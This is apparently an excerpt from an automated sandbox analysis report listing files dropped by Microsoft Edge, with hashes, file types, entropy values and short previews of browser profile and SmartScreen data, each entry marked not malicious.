                                                                                                                                                                                                                                                                                                SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
                                                                                                                                                                                                                                                                                                MD5:FDF465758A7489458B387EB41C7D42B0
                                                                                                                                                                                                                                                                                                SHA1:9509283CF1BD7397790091C5A7580CBA353A1143
                                                                                                                                                                                                                                                                                                SHA-256:C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
                                                                                                                                                                                                                                                                                                SHA-512:9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):348
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.18675369307085
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp40v4q2PcNwi23oH+TcwtfrzAdIFUtL40vJZmwl4MZDDkwOcNwi23oH+Tcwtfa:7p4+4vLZYeb9FUtL4+J/l4cD54ZYeb2J
                                                                                                                                                                                                                                                                                                MD5:3CFA6642595272080FA5CFEFC7E2C3B7
                                                                                                                                                                                                                                                                                                SHA1:91C3B9A70FF07EAB0272AFA4D1CB150C797B78DA
                                                                                                                                                                                                                                                                                                SHA-256:B96A732D54C5E41339A743D3FB782E551D5EB89DACAE6438F2FD016016C19AE9
                                                                                                                                                                                                                                                                                                SHA-512:3A18C96C8A621FBE233E820FB1CF22A8D1FF3E25C497D73FFF77207C2774585B389F7D2884F48C4167358EC3EE3E641ACB699963E34F79DD79FBE7B776EB32BC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.569 13f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/07-07:19:03.569 13f0 Recovering log #3.2025/01/07-07:19:03.570 13f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):120
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089522781425741
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kyTKKGf4SQtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yn8t5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                MD5:3038A8D0E05710A868327285F7F0C658
                                                                                                                                                                                                                                                                                                SHA1:68ED80B00ADDBD5F9D4F9C2264580A9C5B4FE6BB
                                                                                                                                                                                                                                                                                                SHA-256:85FB1EBB5B597609ED3A709AC1F3E106A07FF5474F3FD42C887BCD331F79F560
                                                                                                                                                                                                                                                                                                SHA-512:55B71CFCFF528EB434F0642FD2FAE21283CD077B5D11A2C3C8210D4F175763971257209E588311D5CF1A15B5D7955C8A4F64606D988C3E469F328F37D8E3F5AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089522781425741
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kyTKKGf4SQtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yn8t5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                MD5:3038A8D0E05710A868327285F7F0C658
                                                                                                                                                                                                                                                                                                SHA1:68ED80B00ADDBD5F9D4F9C2264580A9C5B4FE6BB
                                                                                                                                                                                                                                                                                                SHA-256:85FB1EBB5B597609ED3A709AC1F3E106A07FF5474F3FD42C887BCD331F79F560
                                                                                                                                                                                                                                                                                                SHA-512:55B71CFCFF528EB434F0642FD2FAE21283CD077B5D11A2C3C8210D4F175763971257209E588311D5CF1A15B5D7955C8A4F64606D988C3E469F328F37D8E3F5AF
                                                                                                                                                                                                                                                                                                Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                Malicious:false
Preview:SQLite format 3......@ ...
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):47
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):35
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):81
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):130439
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):57
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):575056
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):460992
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:uriCache_
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.009455046491566
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclT3d:YWLSGTt1o9LuLgfGBPAzkVj/T8lJ
                                                                                                                                                                                                                                                                                                MD5:A65575068F03265C32290E759EC8D129
                                                                                                                                                                                                                                                                                                SHA1:9837D61D7020C53D022257670A41648423363A93
                                                                                                                                                                                                                                                                                                SHA-256:190B15042AFF0622098BC579E60FE848F00F086A2B02242FA005C31F05505183
                                                                                                                                                                                                                                                                                                SHA-512:D113999593E2368BE8910CDB0FC7CE3E374D40C460192930F38F90BD71266B494819E44B6310733B7E57106FB4962A460D551F6A95211747CD6E5720D4C53089
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736353146620292}]}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):86
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                                MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                                SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                                SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                                SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):44707
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.095146489362549
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kWuKKGf4yUSqXKVjVqA6N7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynUHOtN7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                MD5:19B3BE8C0FCB8750AD384ABF59ECDD6B
                                                                                                                                                                                                                                                                                                SHA1:024F98A7741EE7953C6F604C3C48E85264F96AF7
                                                                                                                                                                                                                                                                                                SHA-256:282A713DEB0E4EC3F09217C4CBD6698F0009893F67178F56D1F6A2D1C9D9E453
                                                                                                                                                                                                                                                                                                SHA-512:1D508001D62BA7CEB98675E2E67D0D1C53AC7497147203E473DF878463DAC9E71CDC77D2863CA384650429757FB518FEA93B3167A07864E88A4E7469C1353E9E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089522781425741
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kyTKKGf4SQtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yn8t5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                MD5:3038A8D0E05710A868327285F7F0C658
                                                                                                                                                                                                                                                                                                SHA1:68ED80B00ADDBD5F9D4F9C2264580A9C5B4FE6BB
                                                                                                                                                                                                                                                                                                SHA-256:85FB1EBB5B597609ED3A709AC1F3E106A07FF5474F3FD42C887BCD331F79F560
                                                                                                                                                                                                                                                                                                SHA-512:55B71CFCFF528EB434F0642FD2FAE21283CD077B5D11A2C3C8210D4F175763971257209E588311D5CF1A15B5D7955C8A4F64606D988C3E469F328F37D8E3F5AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2278
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8460658585071092
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKxrgxDvYJxl9Il8uV370hC2d86dHSGgtb7uEd1rc:mWAYb70U2iA9gt2D
                                                                                                                                                                                                                                                                                                MD5:19BD98697E3FD4E393A78E0DF932989F
                                                                                                                                                                                                                                                                                                SHA1:772CFEB98D72FD5A53AD33AAE4AD2FB10BA3D0CA
                                                                                                                                                                                                                                                                                                SHA-256:7B0D346936CA84DF4789A4CDBD42C4E65AA4884683A97F2486306E49739468B0
                                                                                                                                                                                                                                                                                                SHA-512:949403859B044F918C5CB4B25BA61E2DE9ECC640B9DB67359A373A5E0B390D1E503185258D84388EB927D8D7FA08C2A999A07272A2553876B2C703DAD6B80888
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4622
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.001252661427602
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:fYjQZgRBWgad+3PIQCffTCnQ/mQOMrVvyP9iyyA:fOKgmgMIIQCz0Im4hK4A
                                                                                                                                                                                                                                                                                                MD5:2FBECFF73D486BD29F0BEDC96443E761
                                                                                                                                                                                                                                                                                                SHA1:10045FC7F907C457BC7B715CABBDC96E6D1795B5
                                                                                                                                                                                                                                                                                                SHA-256:43C10F314A459CD991C8135A517461816768A1932DB1A7D227706757740CDE7C
